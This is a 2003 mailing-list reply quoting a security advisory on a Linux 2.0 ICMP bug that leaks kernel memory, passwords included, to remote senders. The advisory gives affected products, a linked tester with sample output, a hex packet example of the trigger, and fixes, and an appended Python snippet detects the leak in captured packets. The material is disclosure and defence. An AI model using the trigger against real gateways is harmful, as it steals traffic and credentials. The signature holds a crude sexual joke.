Message-ID: <3EE4483B.2000309@d2.net.au>
Date: Mon, 09 Jun 2003 18:41:31 +1000
From: Andrew Griffiths <andrewg@...net.au>
To: Philippe Biondi <biondi@...tel-securite.fr>
Cc: vuln-dev@...urityfocus.com, full-disclosure@...ts.netsys.com,
   bugtraq@...urityfocus.com
Subject: Re: Linux 2.0 remote info leak from too big icmp citation


http://www.securityfocus.com/archive/1/251418/2002-01-15/2002-01-21/0

Looks like another way of triggering the bug, IMO.

Philippe Biondi wrote:
> ----------------------------------------------------------------------
>                Cartel Sécurité --- Security Advisory
> 
> Advisory Number: CARTSA-20030314
> Subject:         Linux 2.0 remote info leak from too big icmp citation
> Author:          Philippe Biondi <biondi@...tel-securite.fr>
> Discovered:      March 14, 2003
> Published:       June 9, 2003
> CERT reference:  VU#471084 (http://www.kb.cert.org/vuls/id/471084)
> ----------------------------------------------------------------------
> 
> You can use this URL to link this document :
> http://www.cartel-securite.fr/pbiondi/adv/CARTSA-20030314-icmpleak.txt
> 
> 
> Problem description
> ===================
> 
> There is a bug in the way linux 2.0 kernel IP stack computes the size of an
> ICMP citation for almost every ICMP error. This leads to too much data being
> sent on the network, coming from anywhere in the memory.
> 
> This is a very important leak. Experiments show that even passwords can
> be stolen. Moreover, you can do this from anywhere on the internet, as soon
> as you can send IP packets to the vulnerable host (except special firewalling).
> 
> The typical case is when you use a linux 2.0 box (or, more probably,
> any appliance that uses it) as a masquerading gateway for internet and
> DMZ. In this configuration, the gateway can be used to leak potentially
> all your traffic from your LAN, even your POP passwords for
> the mail server in the DMZ.
> 
> 
> Vulnerable products
> ===================
> 
> Any 2.0 linux kernel before 2.0.39 (2.0.39 included)
> Watchguard Firebox II
> 
> Any appliance (firewall, proxy, etc.) that uses linux 2.0 <= 2.0.39
> 
> 
> A tester can be found here (no guarantee though) :
> http://www.cartel-securite.fr/pbiondi/python/icmpleaktest.py
> 
> Vulnerable:
> # ./icmpleaktest.py  192.168.11.2
> Packet sent. Answer should take 31s. Interrupt with C-c
> Got '\x95\x03\x1a\x10Ji\xfb\xba\xd0\xc5Q\x14\x877\xbd\x8a;\xb3^\x7f'
> 
> Not vulnerable:
> # ./icmpleaktest.py  172.16.1.40
> Packet sent. Answer should take 31s. Interrupt with C-c
> Got ''
> 
> 
> Vendor status
> =============
> 
> Linux 2.0.40 should be out soon.

I was under the impression they would have fixed it earlier. That said, 
I wouldn't be surprised.

> Watchguard said updated releases will follow.
> 
> These vendors said they are not vulnerable :
> * Netscreen
> * Symantec
> * Novell
> * Clavister
> * Ingrian
> * StoneSoft
> * Sun
> 
> 
> Solutions
> =========
> 
> * patch at http://www.cartel-securite.fr/pbiondi/patches/icmpleak.patch
>   (No guarantee)
> * exchange your old appliance for a brand new linux 2.4/netfilter
> 
> 
> Workarounds
> ===========
> 
> No good workarounds. But you can at least carefully try these :
> * truncate ICMP errors at the RFC limit,
> * filter out icmp errors
> 
> 
> Example
> =======
> 
> We can send an IP packet with the MF flag :
> 
> 15:41:05  192.168.0.12.80 > 192.168.0.10.80:  udp 4 (frag 52007:12@0+)
> 0x0000   4500 0020 cb27 2000 4011 0e3f c0a8 000c        E....'..@.......
> 0x0010   c0a8 000a 0050 0050 000c cd1e 5858 5858        .....P.P....XXXX
> 
> we wait 30s for the reassembly to timeout :
> 
> 15:41:35  192.168.0.10 > 192.168.0.12: icmp: ip reassembly time exceeded [tos 0xc0]
> 0x0000   45c0 0050 dcca 0000 4001 1bbc c0a8 000a        E..P....@.......
> 0x0010   c0a8 000c 0b01 aa24 0000 0000 4500 0020        .......$....E...
> 0x0020   cb27 2000 4011 0e3f c0a8 000c c0a8 000a        .'..@...........
> 0x0030   0050 0050 000c cd1e 5858 5858                  .P.P....XXXX
>                                        0050 0050                    .P.P
> 0x0040   000c cd1e 5858 5858 207b 2d68 0000 0000        ....XXXX.{-h....
> 
> 
> Bytes at offsets 0x3c to 0x4f are bonus.
> It works with every ICMP error except the port unreachable error.
> It is possible to increase the size of data leaked by adding IP options.
> 
> 
> Examples of bonus bytes :
> 
> 
> 
> ----------------------------------------------------------------------
> Copyright (c) Cartel Sécurité
> This document is copyrighted. It can't be edited nor republished
> without explicit consent of Cartel Sécurité.
> For more information, feel free to contact us.
> http://www.cartel-securite.fr/
> ----------------------------------------------------------------------
> 


Sincerely,
Andrew Griffiths

-- 
<Kahless> geez, u climb the highest mountain, netstumble the highest 
mast, but
you suck one cock........
<Clonefish> No thanks
<Kahless> hey, it wasn't an invitation........
<RokLobsta> or you help luigi build his house, guiseppe to get his business
going and you save the town from a meteor, but you fuck one goat....
<Kahless> that's the one
<Clonefish> Mmmmkay.....
<swarm> um
<swarm> next topic plz
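
A detection-side check for the oversized citation described in the quoted advisory, as an added example that is not part of either message and is not Cartel Sécurité's tester: it parses a captured ICMP error and flags quoted bytes beyond the total length claimed by the embedded original IP header. The name `analyze_icmp_error` and the result keys are hypothetical; the sample input is the ICMP reply from the advisory's own dump.

```python
# Input: the 80-byte ICMP "reassembly time exceeded" reply, copied from the
# tcpdump hex in the advisory quoted above.
SAMPLE_REPLY = bytes.fromhex(
    "45c00050dcca000040011bbcc0a8000a"
    "c0a8000c0b01aa240000000045000020"
    "cb27200040110e3fc0a8000cc0a8000a"
    "00500050000ccd1e5858585800500050"
    "000ccd1e58585858207b2d6800000000"
)

# destination unreachable, source quench, redirect, time exceeded, parameter problem
ICMP_ERROR_TYPES = {3, 4, 5, 11, 12}


def analyze_icmp_error(packet: bytes) -> dict:
    """Compare the citation in an IPv4 ICMP error with the original datagram size."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        raise ValueError("not an IPv4 packet")
    outer_ihl = (packet[0] & 0x0F) * 4
    outer_len = int.from_bytes(packet[2:4], "big")
    if outer_ihl < 20 or outer_len > len(packet) or packet[9] != 1:
        raise ValueError("truncated capture or not ICMP")
    icmp = packet[outer_ihl:outer_len]
    if len(icmp) < 8 + 20 or icmp[0] not in ICMP_ERROR_TYPES:
        raise ValueError("not an ICMP error carrying a quoted IP header")
    quoted = icmp[8:]                               # citation: original IP header + data
    inner_ihl = (quoted[0] & 0x0F) * 4
    inner_len = int.from_bytes(quoted[2:4], "big")  # total length the original claimed
    if inner_ihl < 20 or inner_len < inner_ihl:
        raise ValueError("malformed quoted IP header")
    excess = quoted[inner_len:]                     # bytes that were never in the original
    return {
        "icmp_type": icmp[0],
        "icmp_code": icmp[1],
        "quoted_len": len(quoted),
        "original_len": inner_len,
        "rfc792_len": inner_ihl + 8,                # RFC 792: IP header + 64 bits of data
        "excess_offset": outer_ihl + 8 + inner_len if excess else None,
        "excess": excess,
    }


if __name__ == "__main__":
    r = analyze_icmp_error(SAMPLE_REPLY)
    print(f"type={r['icmp_type']} code={r['icmp_code']} quoted={r['quoted_len']} "
          f"original={r['original_len']} excess={len(r['excess'])} bytes "
          f"from offset {r['excess_offset']}")
```

A non-empty `excess` on ICMP errors leaving a gateway is the signal to look for; `rfc792_len` is the length the "truncate ICMP errors at the RFC limit" workaround would cut the citation to.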

